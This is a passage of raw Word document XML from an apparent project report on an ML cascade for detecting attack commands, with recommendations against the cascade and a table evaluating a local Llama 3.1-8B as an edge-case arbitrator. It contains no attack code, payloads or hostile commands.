      <w:r>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>precisely</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stage 2's own accuracy on the same rows; its 60 and 42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>overrides split 30/30 and 21/21 between helping and hurting. An arbitrator that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>does not beat the model it is overriding is strictly a latency cost, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>offline stub does not. A live arbitrator must clear 58.9% (D1) and 63.4% (D2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>accuracy on these specific commands before routing to it is defensible at all —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a lower bar than it sounds, since these are the rows a keyword rule and a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>gradient-boosted tree both find genuinely hard, but a real one, and one the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>bonus chapter must measure rather than assume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What should ship</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Three recommendations follow from the measurements, and the report makes them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rather than presenting the cascade as a success.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The three-stage cascade should not be the deployed configuration.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>single XGBoost-hybrid at a tuned threshold dominates it on both corpora. If</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the deployment values precision over recall, that preference is expressed by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the threshold, where it is visible, auditable and free — not by an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>architecture that expresses it accidentally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stage 1 should be dropped from the cascade, not re-tuned.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Its recall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>calibration and its throughput saving are in direct conflict, and at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>recall-safe end of that trade-off it clears too little to matter while still</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>discarding 9 and 7 real attacks. Chapter 8.1's finding that the Isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Forest's false negatives are a strict superset of the Random Forest's is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>structural reason: it has no independent view of the attack class to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>contribute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The routing rule should be kept and the arbitrator replaced.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The band is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the most valuable 5% of traffic in this project — a well-identified pocket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>where the best available model is near-chance — and the oracle bound says a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>competent second opinion there is worth more than any model swap measured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>anywhere else in Chapter 6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The general lesson is one the chapter should state directly, because it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>generalises past this project: a multi-stage architecture must be evaluated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>against the strongest single-stage configuration of its own components, at a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>tuned operating point. Evaluated against nothing, this cascade looks like a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">33% reduction in false alarms. Evaluated against one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comparison, it is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>regression.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Bonus B.3 — LLM verdict evaluation on edge cases (Ben)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arbitrator: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Llama 3.1-8B (llama3.1:8b via Ollama, local inference)</w:t>
      </w:r>
      <w:r>
        <w:t>. Edge cases = primary models (XGBoost, 1D-CNN, Isolation Forest) disagree (score gap ≥ 0.4) or any is unconfident (score in [0.35, 0.65]).</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before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>test rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>edge cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>edge %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LLM acc on edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>model-vote acc on edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LLM–vote agreement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mean latency (s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LLM calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>434</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14.2%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.608</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.684</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.652</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11.36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1915</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>270</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14.1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.633</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.670</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.615</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11.05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>270</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On both corpora the local Llama-3.1-8B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>trails the models' own majority vote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on exactly the cases where that vote is least certain (0.608 vs 0.684 on D1, 0.633 vs 0.670 on D2), and it agrees with the vote only ~62–65% of the time — so on this uncertain slice the LLM behaves as a genuinely independent voter rather than a rubber stamp, but it does not out-arbitrate the ensemble it was meant to break ties for. Each verdict cost a mean of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>~11.2 s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on a local M3 Pro (Ollama, GPU), so the full edge set of 434 + 270 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>704 calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ran in ≈82 min (D1) + ≈50 min (D2) ≈ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2.2 h total</w:t>
      </w:r>
      <w:r>
        <w:t>; at the ~14% edge fraction that is the entire LLM cost per evaluation, because the other ~86% of the test set never reaches the model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>B.4 operational tradeoff (support)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The cascade only routes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>edge cases</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the LLM, so total LLM calls per evaluation = the 'LLM calls' column, not the full test set — the assignment's hard requirement. At the measured ~11 s/call and ~14% edge fraction, the per-run LLM wall-clock is that fraction × latency (≈82 min for D1's 3,049 rows, ≈50 min for D2's 1,915), which is only tolerable because the fraction stays small.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Whether this is production-viable depends on the edge fraction staying small; if the primary models disagree on a large slice, the LLM becomes the bottleneck and the honest conclusion is that the cascade needs a tighter uncertainty band, not more LLM.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